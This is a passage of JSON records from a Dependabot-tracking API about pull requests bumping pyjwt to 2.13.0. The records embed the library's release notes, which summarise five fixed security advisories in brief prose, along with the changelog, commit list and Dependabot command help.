yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/ShadowTag-v2/shadowtagai-monorepo-v2/pull/348","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShadowTag-v2%2Fshadowtagai-monorepo-v2/issues/348","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/348/packages"}},{"old_version":"\u003e=2.8.0","new_version":"\u003e=2.13.0","update_type":"minor","path":"/backend","pr_created_at":"2026-06-11T00:53:26.000Z","version_change":"\u003e=2.8.0 → \u003e=2.13.0","issue":{"uuid":"4636229827","node_id":"PR_kwDOSDePOc7lGuoV","number":18,"state":"closed","title":"chore(deps): update pyjwt requirement from \u003e=2.8.0 to \u003e=2.13.0 in /backend","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-06-11T01:09:45.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-11T00:53:26.000Z","updated_at":"2026-06-11T01:09:48.000Z","time_to_close":979,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): update","packages":[{"name":"pyjwt","old_version":"\u003e=2.8.0","new_version":"\u003e=2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":"/backend","ecosystem":"pip"},"body":"Updates the requirements on [pyjwt](https://github.com/jpadilla/pyjwt) to permit the latest version.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev2.12.1 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\u0026amp;gt;\u003c/code\u003e__\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/a4e1a3d1218b01c5806420b8f16d9308ac4adc30\"\u003e\u003ccode\u003ea4e1a3d\u003c/code\u003e\u003c/a\u003e Add typing_extensions dependency for Python \u0026lt; 3.11 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1151\"\u003e#1151\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/bd9700cca7f9258fadcc429c1034e508025931f2\"\u003e\u003ccode\u003ebd9700c\u003c/code\u003e\u003c/a\u003e Use PyJWK algorithm when encoding without explicit algorithm (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1148\"\u003e#1148\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.8.0...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/HamzaNasiem/bytelytic-clinic-os/pull/18","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/HamzaNasiem%2Fbytelytic-clinic-os/issues/18","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/18/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":"/backend","pr_created_at":"2026-06-09T04:31:23.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4618840857","node_id":"PR_kwDORrCc587kNhse","number":90,"state":"open","title":"chore(deps): Bump pyjwt from 2.12.1 to 2.13.0 in /backend","user":"dependabot[bot]","labels":["Security"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-09T04:31:23.000Z","updated_at":"2026-06-09T04:31:24.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): Bump","packages":[{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":"/backend","ecosystem":"pip"},"body":"Bumps [pyjwt](https://github.com/jpadilla/pyjwt) from 2.12.1 to 2.13.0.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca 